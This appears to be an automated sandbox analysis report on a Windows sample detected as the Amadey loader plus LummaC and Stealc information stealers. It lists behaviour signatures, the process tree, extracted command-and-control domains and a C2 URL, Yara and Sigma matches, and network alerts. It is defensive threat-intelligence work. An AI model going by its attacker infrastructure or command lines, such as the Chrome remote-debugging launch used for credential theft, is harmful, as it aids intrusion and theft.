Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
file.exe

Overview

General Information

Sample name:file.exe
Analysis ID:1579386
MD5:cf6393e173fb6315d0c681bc78eb3528
SHA1:26dc307ae4ea1866d40c9a34e38768733ec30b34
SHA256:3dee7134cbeea75160519a338fc848a18af80c46ef475fcd3c69a463d449c35d
Tags:Amadeyexeuser-Bitsight
Infos:

Detection

LummaC, Amadey, Credential Flusher, LummaC Stealer, Stealc
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus / Scanner detection for submitted sample
Antivirus detection for dropped file
Attempt to bypass Chrome Application-Bound Encryption
Detected unpacking (changes PE section rights)
Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
Yara detected Amadeys Clipper DLL
Yara detected Amadeys stealer DLL
Yara detected Credential Flusher
Yara detected LummaC Stealer
Yara detected Powershell download and execute
Yara detected Stealc
AI detected suspicious sample
Binary is likely a compiled AutoIt script file
C2 URLs / IPs found in malware configuration
Contains functionality to inject code into remote processes
Contains functionality to start a terminal service
Creates files in the system32 config directory
Creates multiple autostart registry keys
Drops PE files to the document folder of the user
Drops large PE files
Drops password protected ZIP file
Found evasive API chain (may stop execution after reading information in the PEB, e.g. number of processors)
Found many strings related to Crypto-Wallets (likely being stolen)
Hides threads from debuggers
Injects a PE file into a foreign processes
Leaks process information
LummaC encrypted strings found
Machine Learning detection for dropped file
Machine Learning detection for sample
PE file contains section with special chars
Query firmware table information (likely to detect VMs)
Sigma detected: New RUN Key Pointing to Suspicious Folder
Tries to detect process monitoring tools (Task Manager, Process Explorer etc.)
Tries to detect sandboxes / dynamic malware analysis system (registry check)
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Tries to detect sandboxes and other dynamic analysis tools (window names)
Tries to detect virtualization through RDTSC time measurements
Tries to evade debugger and weak emulator (self modifying code)
Tries to harvest and steal Bitcoin Wallet information
Tries to harvest and steal browser information (history, passwords, etc)
Tries to harvest and steal ftp login credentials
Tries to steal Crypto Currency Wallets
Tries to steal Mail credentials (via file / registry access)
Uses the Telegram API (likely for C&C communication)
Writes many files with high entropy
AV process strings found (often used to terminate AV products)
Abnormal high CPU Usage
Binary contains a suspicious time stamp
Checks for debuggers (devices)
Checks for kernel debuggers (NtQuerySystemInformation(SystemKernelDebuggerInformation))
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Checks if the current process is being debugged
Contains capabilities to detect virtual machines
Contains functionality for execution timing, often used to detect debuggers
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to query locales information (e.g. system language)
Contains functionality to read the PEB
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Contains long sleeps (>= 3 min)
Creates COM task schedule object (often to register a task for autostart)
Creates a process in suspended mode (likely to inject code)
Creates files inside the system directory
Creates job files (autostart)
Deletes files inside the Windows folder
Detected potential crypto function
Downloads executable code via HTTP
Drops PE files
Drops PE files to the application program directory (C:\ProgramData)
Drops files with a non-matching file extension (content does not match file extension)
Enables security privileges
Entry point lies outside standard sections
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found dropped PE file which has not been started or loaded
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
Installs a Chrome extension
May sleep (evasive loops) to hinder dynamic analysis
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
PE file contains an invalid checksum
PE file contains sections with non-standard names
Queries information about the installed CPU (vendor, model number etc)
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Searches for user specific document files
Shows file infection / information gathering behavior (enumerates multiple directory for files)
Sigma detected: Browser Started with Remote Debugging
Sigma detected: Chromium Browser Instance Executed With Custom Extension
Sigma detected: CurrentVersion Autorun Keys Modification
Suricata IDS alerts with low severity for network traffic
Uses 32bit PE files
Uses Microsoft's Enhanced Cryptographic Provider
Uses code obfuscation techniques (call, push, ret)
Yara detected Credential Stealer
Yara signature match

Classification

  • System is w10x64
  • file.exe (PID: 7624 cmdline: "C:\Users\user\Desktop\file.exe" MD5: CF6393E173FB6315D0C681BC78EB3528)
    • skotes.exe (PID: 7824 cmdline: "C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe" MD5: CF6393E173FB6315D0C681BC78EB3528)
  • skotes.exe (PID: 2472 cmdline: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe MD5: CF6393E173FB6315D0C681BC78EB3528)
    • af155ed129.exe (PID: 7796 cmdline: "C:\Users\user\AppData\Local\Temp\1019800001\af155ed129.exe" MD5: 87330F1877C33A5A6203C49075223B16)
    • cd2469328d.exe (PID: 7664 cmdline: "C:\Users\user\AppData\Local\Temp\1019801001\cd2469328d.exe" MD5: AFD936E441BF5CBDB858E96833CC6ED3)
      • conhost.exe (PID: 7672 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • cd2469328d.exe (PID: 7808 cmdline: "C:\Users\user\AppData\Local\Temp\1019801001\cd2469328d.exe" MD5: AFD936E441BF5CBDB858E96833CC6ED3)
      • cd2469328d.exe (PID: 7820 cmdline: "C:\Users\user\AppData\Local\Temp\1019801001\cd2469328d.exe" MD5: AFD936E441BF5CBDB858E96833CC6ED3)
    • 5cda6c90d7.exe (PID: 5040 cmdline: "C:\Users\user\AppData\Local\Temp\1019802001\5cda6c90d7.exe" MD5: 15709EBA2AFAF7CC0A86CE0ABF8E53F1)
    • 7739517025.exe (PID: 4956 cmdline: "C:\Users\user\AppData\Local\Temp\1019803001\7739517025.exe" MD5: 51FF79B406CB223DD49DD4C947EC97B0)
      • Gxtuum.exe (PID: 5812 cmdline: "C:\Users\user\AppData\Local\Temp\e458d263c0\Gxtuum.exe" MD5: 51FF79B406CB223DD49DD4C947EC97B0)
    • cc6f25572f.exe (PID: 2212 cmdline: "C:\Users\user\AppData\Local\Temp\1019804001\cc6f25572f.exe" MD5: 3567CB15156760B2F111512FFDBC1451)
      • graph.exe (PID: 8168 cmdline: "C:\Program Files\Windows Media Player\graph\graph.exe" MD5: 7D254439AF7B1CAAA765420BEA7FBD3F)
        • chrome.exe (PID: 5788 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --load-extension="" MD5: 45DE480806D1B5D462A7DDE4DCEFC4E4)
          • chrome.exe (PID: 1564 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2076 --field-trial-handle=2004,i,2036866093412023983,10134248747286953754,262144 /prefetch:8 MD5: 45DE480806D1B5D462A7DDE4DCEFC4E4)
        • chrome.exe (PID: 5376 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --load-extension="" MD5: 45DE480806D1B5D462A7DDE4DCEFC4E4)
          • chrome.exe (PID: 600 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2484 --field-trial-handle=2328,i,6628927633879078987,5168946575575726865,262144 /prefetch:8 MD5: 45DE480806D1B5D462A7DDE4DCEFC4E4)
    • b6638733e4.exe (PID: 2648 cmdline: "C:\Users\user\AppData\Local\Temp\1019805001\b6638733e4.exe" MD5: A42B5A11FB98E17DCA2EA358EAC541DE)
      • chrome.exe (PID: 5236 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --remote-debugging-port=9222 --profile-directory="Default" MD5: 45DE480806D1B5D462A7DDE4DCEFC4E4)
    • b05c9e01f3.exe (PID: 3896 cmdline: "C:\Users\user\AppData\Local\Temp\1019806001\b05c9e01f3.exe" MD5: 17830E6496A4FA2D4DC73BA36CE61725)
    • fed209a298.exe (PID: 2996 cmdline: "C:\Users\user\AppData\Local\Temp\1019807001\fed209a298.exe" MD5: 3A425626CBD40345F5B8DDDD6B2B9EFA)
      • cmd.exe (PID: 8040 cmdline: C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Local\Temp\main\main.bat" /S" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
        • conhost.exe (PID: 2588 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • mode.com (PID: 4548 cmdline: mode 65,10 MD5: BEA7464830980BF7C0490307DB4FC875)
        • 7z.exe (PID: 3156 cmdline: 7z.exe e file.zip -p24291711423417250691697322505 -oextracted MD5: 619F7135621B50FD1900FF24AADE1524)
        • 7z.exe (PID: 2916 cmdline: 7z.exe e extracted/file_7.zip -oextracted MD5: 619F7135621B50FD1900FF24AADE1524)
        • 7z.exe (PID: 1816 cmdline: 7z.exe e extracted/file_6.zip -oextracted MD5: 619F7135621B50FD1900FF24AADE1524)
        • 7z.exe (PID: 2496 cmdline: 7z.exe e extracted/file_5.zip -oextracted MD5: 619F7135621B50FD1900FF24AADE1524)
        • 7z.exe (PID: 6200 cmdline: 7z.exe e extracted/file_4.zip -oextracted MD5: 619F7135621B50FD1900FF24AADE1524)
        • 7z.exe (PID: 6540 cmdline: 7z.exe e extracted/file_3.zip -oextracted MD5: 619F7135621B50FD1900FF24AADE1524)
        • 7z.exe (PID: 7916 cmdline: 7z.exe e extracted/file_2.zip -oextracted MD5: 619F7135621B50FD1900FF24AADE1524)
        • 7z.exe (PID: 5716 cmdline: 7z.exe e extracted/file_1.zip -oextracted MD5: 619F7135621B50FD1900FF24AADE1524)
        • attrib.exe (PID: 7668 cmdline: attrib +H "in.exe" MD5: 5037D8E6670EF1D89FB6AD435F12A9FD)
        • in.exe (PID: 3900 cmdline: "in.exe" MD5: 83D75087C9BF6E4F07C36E550731CCDE)
    • c9d0f96e57.exe (PID: 5548 cmdline: "C:\Users\user\AppData\Local\Temp\1019808001\c9d0f96e57.exe" MD5: 63941836D5C054B13AE7B96F743C38CB)
    • 142c991362.exe (PID: 7012 cmdline: "C:\Users\user\AppData\Local\Temp\1019809001\142c991362.exe" MD5: F417402BF33D99A0AF654DFBF7042087)
    • 35f0a75b93.exe (PID: 7748 cmdline: "C:\Users\user\AppData\Local\Temp\1019810001\35f0a75b93.exe" MD5: F853C23F7A2641FEB4E4B94F59728314)
    • 2e4e1b8516.exe (PID: 4904 cmdline: "C:\Users\user\AppData\Local\Temp\1019811001\2e4e1b8516.exe" MD5: 58F6FD6BFBBB99454234A6099D39E954)
  • Gxtuum.exe (PID: 5172 cmdline: C:\Users\user\AppData\Local\Temp\e458d263c0\Gxtuum.exe MD5: 51FF79B406CB223DD49DD4C947EC97B0)
  • cc6f25572f.exe (PID: 4628 cmdline: C:\Users\user\AppData\Local\Temp\1019804001\cc6f25572f.exe MD5: 3567CB15156760B2F111512FFDBC1451)
    • graph.exe (PID: 6692 cmdline: "C:\Program Files\Windows Media Player\graph\graph.exe" MD5: 7D254439AF7B1CAAA765420BEA7FBD3F)
  • graph.exe (PID: 7300 cmdline: "C:\Program Files\Windows Media Player\graph\graph.exe" MD5: 7D254439AF7B1CAAA765420BEA7FBD3F)
    • chrome.exe (PID: 5472 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --load-extension="" MD5: 45DE480806D1B5D462A7DDE4DCEFC4E4)
      • chrome.exe (PID: 1516 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2092 --field-trial-handle=1896,i,12670110117547472489,9919710974034133825,262144 /prefetch:8 MD5: 45DE480806D1B5D462A7DDE4DCEFC4E4)
    • chrome.exe (PID: 1340 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --load-extension="" MD5: 45DE480806D1B5D462A7DDE4DCEFC4E4)
      • chrome.exe (PID: 8008 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2060 --field-trial-handle=2020,i,9689288529753768681,16251776256977340336,262144 /prefetch:8 MD5: 45DE480806D1B5D462A7DDE4DCEFC4E4)
  • graph.exe (PID: 2024 cmdline: "C:\Program Files\Windows Media Player\graph\graph.exe" MD5: 7D254439AF7B1CAAA765420BEA7FBD3F)
    • chrome.exe (PID: 7448 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --load-extension="" MD5: 45DE480806D1B5D462A7DDE4DCEFC4E4)
  • 142c991362.exe (PID: 348 cmdline: "C:\Users\user\AppData\Local\Temp\1019809001\142c991362.exe" MD5: F417402BF33D99A0AF654DFBF7042087)
  • cleanup
NameDescriptionAttributionBlogpost URLsLink
Lumma Stealer, LummaC2 StealerLumma Stealer (aka LummaC2 Stealer) is an information stealer written in C language that has been available through a Malware-as-a-Service (MaaS) model on Russian-speaking forums since at least August 2022. It is believed to have been developed by the threat actor "Shamel", who goes by the alias "Lumma". Lumma Stealer primarily targets cryptocurrency wallets and two-factor authentication (2FA) browser extensions, before ultimately stealing sensitive information from the victim's machine. Once the targeted data is obtained, it is exfiltrated to a C2 server via HTTP POST requests using the user agent "TeslaBrowser/5.5"." The stealer also features a non-resident loader that is capable of delivering additional payloads via EXE, DLL, and PowerShell.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.lumma
NameDescriptionAttributionBlogpost URLsLink
AmadeyAmadey is a botnet that appeared around October 2018 and is being sold for about $500 on Russian-speaking hacking forums. It periodically sends information about the system and installed AV software to its C2 server and polls to receive orders from it. Its main functionality is that it can load other payloads (called "tasks") for all or specifically targeted computers compromised by the malware.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.amadey
NameDescriptionAttributionBlogpost URLsLink
StealcStealc is an information stealer advertised by its presumed developer Plymouth on Russian-speaking underground forums and sold as a Malware-as-a-Service since January 9, 2023. According to Plymouth's statement, stealc is a non-resident stealer with flexible data collection settings and its development is relied on other prominent stealers: Vidar, Raccoon, Mars and Redline.Stealc is written in C and uses WinAPI functions. It mainly targets date from web browsers, extensions and Desktop application of cryptocurrency wallets, and from other applications (messengers, email clients, etc.). The malware downloads 7 legitimate third-party DLLs to collect sensitive data from web browsers, including sqlite3.dll, nss3.dll, vcruntime140.dll, mozglue.dll, freebl3.dll, softokn3.dll and msvcp140.dll. It then exfiltrates the collected information file by file to its C2 server using HTTP POST requests.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.stealc
{"C2 url": ["cheapptaxysu.click", "necklacebudi.lat", "aspecteirs.lat", "crosshuaht.lat", "rapeflowwj.lat", "discokeyus.lat", "sustainskelet.lat", "grannyejh.lat", "energyaffai.lat"], "Build id": "CZJvss--geopoxid"}
{"C2 url": "185.215.113.43/Zu7JuNko/index.php", "Version": "4.42", "Install Folder": "abc3bc1985", "Install File": "skotes.exe"}
SourceRuleDescriptionAuthorStrings
sslproxydump.pcapJoeSecurity_LummaCStealer_3Yara detected LummaC StealerJoe Security
    sslproxydump.pcapJoeSecurity_LummaCStealer_2Yara detected LummaC StealerJoe Security
      SourceRuleDescriptionAuthorStrings
      C:\Program Files\Windows Media Player\1w4lv5IzuEVOMa3sjCc6orj2dWPvJoK5fINDICATOR_SUSPICIOUS_IMG_Embedded_ArchiveDetects images embedding archives. Observed in TheRat RAT.ditekSHen
      • 0x82f3:$zipwopass: 50 4B 03 04 14 00 00 00
      C:\Windows\System32\config\systemprofile\AppData\Local\Microsoft\Windows\INetCache\IE\output[1].pngINDICATOR_SUSPICIOUS_IMG_Embedded_ArchiveDetects images embedding archives. Observed in TheRat RAT.ditekSHen
      • 0x82f3:$zipwopass: 50 4B 03 04 14 00 00 00
      C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\random[1].exeJoeSecurity_Amadey_3Yara detected Amadey\'s Clipper DLLJoe Security
        C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZVZFKMB9\output[1].pngINDICATOR_SUSPICIOUS_IMG_Embedded_ArchiveDetects images embedding archives. Observed in TheRat RAT.ditekSHen
        • 0x82f3:$zipwopass: 50 4B 03 04 14 00 00 00
        C:\Users\user\AppData\Local\Temp\e458d263c0\Gxtuum.exeJoeSecurity_Amadey_3Yara detected Amadey\'s Clipper DLLJoe Security
          Click to see the 1 entries
          SourceRuleDescriptionAuthorStrings
          0000000B.00000003.2690845654.0000000000D94000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
            0000000B.00000003.2690960983.0000000000D98000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
              0000002B.00000003.3493806478.0000000005110000.00000004.00001000.00020000.00000000.sdmpJoeSecurity_StealcYara detected StealcJoe Security
                00000000.00000002.1758709605.0000000000851000.00000040.00000001.01000000.00000003.sdmpJoeSecurity_Amadey_2Yara detected Amadey\'s stealer DLLJoe Security
                  00000001.00000002.1790996035.00000000009A1000.00000040.00000001.01000000.00000007.sdmpJoeSecurity_Amadey_2Yara detected Amadey\'s stealer DLLJoe Security
                    Click to see the 13 entries
                    SourceRuleDescriptionAuthorStrings
                    14.2.Gxtuum.exe.aa0000.0.unpackJoeSecurity_Amadey_3Yara detected Amadey\'s Clipper DLLJoe Security
                      13.2.7739517025.exe.530000.0.unpackJoeSecurity_Amadey_3Yara detected Amadey\'s Clipper DLLJoe Security
                        14.0.Gxtuum.exe.aa0000.0.unpackJoeSecurity_Amadey_3Yara detected Amadey\'s Clipper DLLJoe Security
                          15.0.Gxtuum.exe.aa0000.0.unpackJoeSecurity_Amadey_3Yara detected Amadey\'s Clipper DLLJoe Security
                            13.0.7739517025.exe.530000.0.unpackJoeSecurity_Amadey_3Yara detected Amadey\'s Clipper DLLJoe Security
                              Click to see the 2 entries

                              System Summary

                              barindex
                              Source: Registry Key setAuthor: Florian Roth (Nextron Systems), Markus Neis, Sander Wiebing: Data: Details: C:\Users\user\AppData\Local\Temp\1019809001\142c991362.exe, EventID: 13, EventType: SetValue, Image: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe, ProcessId: 2472, TargetObject: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\142c991362.exe
                              Source: Process startedAuthor: pH-T (Nextron Systems), Nasreddine Bencherchali (Nextron Systems): Data: Command: "C:\Program Files\Google\Chrome\Application\chrome.exe" --remote-debugging-port=9222 --profile-directory="Default", CommandLine: "C:\Program Files\Google\Chrome\Application\chrome.exe" --remote-debugging-port=9222 --profile-directory="Default", CommandLine|base64offset|contains: ^", Image: C:\Program Files\Google\Chrome\Application\chrome.exe, NewProcessName: C:\Program Files\Google\Chrome\Application\chrome.exe, OriginalFileName: C:\Program Files\Google\Chrome\Application\chrome.exe, ParentCommandLine: "C:\Users\user\AppData\Local\Temp\1019805001\b6638733e4.exe" , ParentImage: C:\Users\user\AppData\Local\Temp\1019805001\b6638733e4.exe, ParentProcessId: 2648, ParentProcessName: b6638733e4.exe, ProcessCommandLine: "C:\Program Files\Google\Chrome\Application\chrome.exe" --remote-debugging-port=9222 --profile-directory="Default", ProcessId: 5236, ProcessName: chrome.exe
                              Source: Process startedAuthor: Aedan Russell, frack113, X__Junior (Nextron Systems): Data: Command: "C:\Program Files\Google\Chrome\Application\chrome.exe" --load-extension="", CommandLine: "C:\Program Files\Google\Chrome\Application\chrome.exe" --load-extension="", CommandLine|base64offset|contains: , Image: C:\Program Files\Google\Chrome\Application\chrome.exe, NewProcessName: C:\Program Files\Google\Chrome\Application\chrome.exe, OriginalFileName: C:\Program Files\Google\Chrome\Application\chrome.exe, ParentCommandLine: "C:\Program Files\Windows Media Player\graph\graph.exe" , ParentImage: C:\Program Files\Windows Media Player\graph\graph.exe, ParentProcessId: 7300, ParentProcessName: graph.exe, ProcessCommandLine: "C:\Program Files\Google\Chrome\Application\chrome.exe" --load-extension="", ProcessId: 5472, ProcessName: chrome.exe
                              Source: Registry Key setAuthor: Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split): Data: Details: C:\Users\user\AppData\Local\Temp\1019809001\142c991362.exe, EventID: 13, EventType: SetValue, Image: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe, ProcessId: 2472, TargetObject: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\142c991362.exe
                              TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                              2024-12-22T02:16:29.118059+010020283713Unknown Traffic192.168.2.449806172.67.209.202443TCP
                              2024-12-22T02:16:31.600922+010020283713Unknown Traffic192.168.2.449814172.67.209.202443TCP
                              2024-12-22T02:16:35.270547+010020283713Unknown Traffic192.168.2.449822172.67.209.202443TCP
                              2024-12-22T02:16:35.730536+010020283713Unknown Traffic192.168.2.449823104.21.67.146443TCP
                              2024-12-22T02:16:37.412391+010020283713Unknown Traffic192.168.2.449831104.21.67.146443TCP
                              2024-12-22T02:16:37.742476+010020283713Unknown Traffic192.168.2.449832172.67.209.202443TCP
                              2024-12-22T02:16:40.187887+010020283713Unknown Traffic192.168.2.449837172.67.209.202443TCP
                              2024-12-22T02:16:42.967084+010020283713Unknown Traffic192.168.2.449843172.67.209.202443TCP
                              2024-12-22T02:16:43.035757+010020283713Unknown Traffic192.168.2.449844104.21.67.146443TCP
                              2024-12-22T02:16:45.360976+010020283713Unknown Traffic192.168.2.449852104.21.67.146443TCP
                              2024-12-22T02:16:45.744612+010020283713Unknown Traffic192.168.2.449858172.67.209.202443TCP
                              2024-12-22T02:16:48.149320+010020283713Unknown Traffic192.168.2.449863104.21.67.146443TCP
                              2024-12-22T02:16:50.956303+010020283713Unknown Traffic192.168.2.449875172.67.209.202443TCP
                              2024-12-22T02:16:51.289707+010020283713Unknown Traffic192.168.2.449876104.21.67.146443TCP
                              2024-12-22T02:16:54.041776+010020283713Unknown Traffic192.168.2.449885104.21.67.146443TCP
                              2024-12-22T02:16:57.698061+010020283713Unknown Traffic192.168.2.449897104.21.67.146443TCP
                              2024-12-22T02:17:53.710812+010020283713Unknown Traffic192.168.2.450060104.21.21.99443TCP
                              2024-12-22T02:17:56.390951+010020283713Unknown Traffic192.168.2.450068104.21.21.99443TCP
                              2024-12-22T02:18:11.249239+010020283713Unknown Traffic192.168.2.450120104.21.21.99443TCP
                              2024-12-22T02:18:13.327037+010020283713Unknown Traffic192.168.2.450125104.21.21.99443TCP
                              2024-12-22T02:18:13.727782+010020283713Unknown Traffic192.168.2.450128104.21.21.99443TCP
                              2024-12-22T02:18:15.853049+010020283713Unknown Traffic192.168.2.450134104.21.21.99443TCP
                              2024-12-22T02:18:19.112536+010020283713Unknown Traffic192.168.2.450140104.21.21.99443TCP
                              2024-12-22T02:18:20.871417+010020283713Unknown Traffic192.168.2.450141104.21.21.99443TCP
                              2024-12-22T02:18:26.676005+010020283713Unknown Traffic192.168.2.450157104.21.21.99443TCP
                              2024-12-22T02:18:27.288592+010020283713Unknown Traffic192.168.2.450158104.21.21.99443TCP
                              2024-12-22T02:18:31.148526+010020283713Unknown Traffic192.168.2.450162104.21.21.99443TCP
                              2024-12-22T02:18:35.225117+010020283713Unknown Traffic192.168.2.450168104.21.21.99443TCP
                              2024-12-22T02:18:35.564629+010020283713Unknown Traffic192.168.2.450169104.21.21.99443TCP
                              2024-12-22T02:18:40.872079+010020283713Unknown Traffic192.168.2.450174104.21.21.99443TCP
                              2024-12-22T02:18:42.523962+010020283713Unknown Traffic192.168.2.450177104.21.21.99443TCP
                              2024-12-22T02:18:44.392432+010020283713Unknown Traffic192.168.2.450180104.21.21.99443TCP
                              2024-12-22T02:18:46.898718+010020283713Unknown Traffic192.168.2.450185104.21.89.115443TCP
                              2024-12-22T02:18:47.155471+010020283713Unknown Traffic192.168.2.450186104.21.21.99443TCP
                              2024-12-22T02:18:47.244318+010020283713Unknown Traffic192.168.2.450189104.21.21.99443TCP
                              2024-12-22T02:18:49.505434+010020283713Unknown Traffic192.168.2.450205104.21.89.115443TCP
                              2024-12-22T02:18:51.583167+010020283713Unknown Traffic192.168.2.450222104.21.21.99443TCP
                              2024-12-22T02:18:54.202297+010020283713Unknown Traffic192.168.2.450238104.21.21.99443TCP
                              2024-12-22T02:18:54.451679+010020283713Unknown Traffic192.168.2.450240104.21.67.146443TCP
                              2024-12-22T02:18:55.118304+010020283713Unknown Traffic192.168.2.450242104.21.89.115443TCP
                              2024-12-22T02:18:56.513771+010020283713Unknown Traffic192.168.2.450246104.21.21.99443TCP
                              2024-12-22T02:18:56.542531+010020283713Unknown Traffic192.168.2.450247104.21.67.146443TCP
                              2024-12-22T02:18:57.563608+010020283713Unknown Traffic192.168.2.450250104.21.89.115443TCP
                              2024-12-22T02:18:59.069531+010020283713Unknown Traffic192.168.2.450253104.21.21.99443TCP
                              2024-12-22T02:18:59.716293+010020283713Unknown Traffic192.168.2.450254104.21.89.115443TCP
                              2024-12-22T02:19:02.605590+010020283713Unknown Traffic192.168.2.450263104.21.89.115443TCP
                              2024-12-22T02:19:03.057225+010020283713Unknown Traffic192.168.2.450264104.21.67.146443TCP
                              2024-12-22T02:19:05.407782+010020283713Unknown Traffic192.168.2.450274104.21.67.146443TCP
                              2024-12-22T02:19:05.778609+010020283713Unknown Traffic192.168.2.450276104.21.21.99443TCP
                              2024-12-22T02:19:08.412953+010020283713Unknown Traffic192.168.2.450284104.21.89.115443TCP
                              2024-12-22T02:19:08.699676+010020283713Unknown Traffic192.168.2.450286104.21.67.146443TCP
                              2024-12-22T02:19:08.740055+010020283713Unknown Traffic192.168.2.450287104.21.21.99443TCP
                              2024-12-22T02:19:10.971606+010020283713Unknown Traffic192.168.2.450292104.21.67.146443TCP
                              2024-12-22T02:19:13.258407+010020283713Unknown Traffic192.168.2.450298104.21.89.115443TCP
                              2024-12-22T02:19:13.712201+010020283713Unknown Traffic192.168.2.450299104.21.67.146443TCP
                              2024-12-22T02:19:17.756437+010020283713Unknown Traffic192.168.2.450304104.21.67.146443TCP
                              2024-12-22T02:21:34.966397+010020283713Unknown Traffic192.168.2.450517172.67.209.202443TCP
                              2024-12-22T02:21:36.960526+010020283713Unknown Traffic192.168.2.450520172.67.209.202443TCP
                              2024-12-22T02:21:39.594134+010020283713Unknown Traffic192.168.2.450523172.67.209.202443TCP
                              2024-12-22T02:21:41.997027+010020283713Unknown Traffic192.168.2.450526172.67.209.202443TCP
                              2024-12-22T02:21:44.206069+010020283713Unknown Traffic192.168.2.450527172.67.209.202443TCP
                              2024-12-22T02:21:46.956179+010020283713Unknown Traffic192.168.2.450533172.67.209.202443TCP
                              2024-12-22T02:21:49.582086+010020283713Unknown Traffic192.168.2.450541172.67.209.202443TCP
                              2024-12-22T02:21:51.742096+010020283713Unknown Traffic192.168.2.450544172.67.209.202443TCP
                              2024-12-22T02:23:01.348439+010020283713Unknown Traffic192.168.2.450614104.21.89.115443TCP
                              2024-12-22T02:23:03.386494+010020283713Unknown Traffic192.168.2.450616104.21.89.115443TCP
                              2024-12-22T02:23:05.657501+010020283713Unknown Traffic192.168.2.450618104.21.89.115443TCP
                              2024-12-22T02:23:07.823180+010020283713Unknown Traffic192.168.2.450622104.21.89.115443TCP
                              2024-12-22T02:23:10.352798+010020283713Unknown Traffic192.168.2.450624104.21.89.115443TCP
                              2024-12-22T02:23:12.541103+010020283713Unknown Traffic192.168.2.450633104.21.89.115443TCP
                              2024-12-22T02:23:14.735602+010020283713Unknown Traffic192.168.2.450636104.21.89.115443TCP
                              2024-12-22T02:23:16.932736+010020283713Unknown Traffic192.168.2.450639104.21.89.115443TCP
                              TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                              2024-12-22T02:16:29.867508+010020546531A Network Trojan was detected192.168.2.449806172.67.209.202443TCP
                              2024-12-22T02:16:32.377836+010020546531A Network Trojan was detected192.168.2.449814172.67.209.202443TCP
                              2024-12-22T02:16:36.162646+010020546531A Network Trojan was detected192.168.2.449823104.21.67.146443TCP
                              2024-12-22T02:16:38.219742+010020546531A Network Trojan was detected192.168.2.449831104.21.67.146443TCP
                              2024-12-22T02:16:51.740330+010020546531A Network Trojan was detected192.168.2.449875172.67.209.202443TCP
                              2024-12-22T02:16:58.461627+010020546531A Network Trojan was detected192.168.2.449897104.21.67.146443TCP
                              2024-12-22T02:17:54.744267+010020546531A Network Trojan was detected192.168.2.450060104.21.21.99443TCP
                              2024-12-22T02:17:59.189888+010020546531A Network Trojan was detected192.168.2.450068104.21.21.99443TCP
                              2024-12-22T02:18:12.264243+010020546531A Network Trojan was detected192.168.2.450120104.21.21.99443TCP
                              2024-12-22T02:18:14.500972+010020546531A Network Trojan was detected192.168.2.450128104.21.21.99443TCP
                              2024-12-22T02:18:41.650873+010020546531A Network Trojan was detected192.168.2.450174104.21.21.99443TCP
                              2024-12-22T02:18:45.568691+010020546531A Network Trojan was detected192.168.2.450180104.21.21.99443TCP
                              2024-12-22T02:18:47.900850+010020546531A Network Trojan was detected192.168.2.450185104.21.89.115443TCP
                              2024-12-22T02:18:48.034298+010020546531A Network Trojan was detected192.168.2.450189104.21.21.99443TCP
                              2024-12-22T02:18:48.068143+010020546531A Network Trojan was detected192.168.2.450186104.21.21.99443TCP
                              2024-12-22T02:18:50.417360+010020546531A Network Trojan was detected192.168.2.450205104.21.89.115443TCP
                              2024-12-22T02:18:54.885994+010020546531A Network Trojan was detected192.168.2.450240104.21.67.146443TCP
